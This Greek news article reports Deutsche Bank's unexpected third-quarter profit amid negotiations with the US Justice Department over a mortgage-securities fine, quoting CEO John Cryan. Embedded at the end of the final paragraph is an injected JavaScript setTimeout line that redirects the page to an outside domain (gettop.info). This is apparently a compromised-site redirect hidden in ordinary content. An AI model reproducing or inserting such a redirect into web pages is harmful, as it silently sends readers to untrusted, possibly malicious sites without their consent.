Κέρδη ανακοίνωσε η Deutsche Bank

0
5
The headquarters of Deutsche Bank are pictured in Frankfurt in this October 29, 2013 file picture. German banking regulator Bafin has demanded documents from Deutsche Bank as part of a probe into suspected manipulation of benchmark gold and silver prices by banks, the Financial Times reported, citing sources. Picture taken October 29, 2013. REUTERS/Ralph Orlowski/Files (GERMANY - Tags: BUSINESS)

 

Δύσκολους καιρούς αντιμετωπίζει η Deutsche Bank καθώς επιδιώκει να ολοκληρώσει τις συζητήσεις με τις αμερικανικές δικαστικές Αρχές για το πρόστιμο άνω των 14 δισ. δολαρίων που έχουν προτείνει, αλλά παρ’ όλα αυτά ο επικεφαλής της Τζον Κράιαν υποσχέθηκε  να πολλαπλασιάσει τις προσπάθειες αναδιάρθρωσής της .

Η γερμανική τράπεζα ανακοίνωσε μη αναμενόμενα κέρδη για το τρίτο τρίμηνο, επωφελούμενη από τη συγκρατημένη ανάκαμψη στις συναλλαγές σε ομόλογα, τα οποία κέρδη όμως δεν μπόρεσαν να διαλύσουν τα σύννεφα της αβεβαιότητας που οδήγησαν πελάτες της να αποσύρουν αρκετά δισεκατομμύρια ευρώ.

«Το τρίμηνο επισκιάσθηκε σαφώς από την προσοχή που δίνεται στις διαπραγματεύσεις μας αναφορικά με την αρχική πρόταση διακανονισμού του αμερικανικού υπουργείου Δικαιοσύνης για τα θέματα των τιτλοποιημένων στεγαστικών ομολόγων μας. Αυτό προκάλεσε αβεβαιότητα», δήλωσε ο Κράιαν σε τηλεδιάσκεψη, προσθέτοντας: «Αβεβαιότητα που επηρεάζει την άποψη της αγοράς για τη DB ως επένδυση, αβεβαιότητα που επηρέασε τις απόψεις κάποιων πελατών της Deutsche Bank ως αντισυμβαλλόμενων και αβεβαιότητα που επηρεάζει ακόμη και τον χρηματοδοτικό προγραμματισμό και την υλοποίηση της στρατηγικής μας».

Σε επιστολή του προς το προσωπικό της τράπεζας, ο Κράιαν έγραψε: «Δυστυχώς, πρέπει να υποθέσουμε ότι η κατάσταση θα παραμείνει δύσκολη για κάποιο διάστημα», προσθέτοντας ότι η τράπεζα εργάζεται σκληρά για να ολοκληρώσει τις διαπραγματεύσεις για το πρόστιμο «το συντομότερο δυνατό». «Θα… επιταχύνουμε και εντατικοποιήσουμε την αναδιάρθρωσή μας», έγραψε, αναφερόμενος επίσης σε ένα γενικότερα επιδεινούμενο περιβάλλον σε ορισμένους σημαντικούς τομείς. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here